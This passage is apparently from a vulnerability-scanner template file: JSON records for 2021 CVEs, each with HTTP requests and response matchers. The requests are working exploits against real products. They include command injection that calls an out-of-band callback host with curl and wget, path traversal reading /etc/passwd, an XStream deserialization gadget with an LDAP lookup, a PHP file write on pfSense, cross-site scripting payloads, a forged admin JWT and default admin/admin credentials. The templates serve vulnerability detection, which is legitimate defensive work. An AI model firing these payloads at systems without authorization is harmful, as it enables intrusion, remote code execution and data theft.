xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?m)^-----BEGIN PRIVATE KEY-----"]},{"type":"word","part":"header","words":["application/json","application/html"],"condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}/"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains_all(header, \"X-Interactsh-Version\", \"Server: oast\")","!contains(body, '<h1> Interactsh Server </h1>')"],"condition":"and"}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25079","info":{"name":"Contact Form Entries < 1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"],"condition":"and"}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: 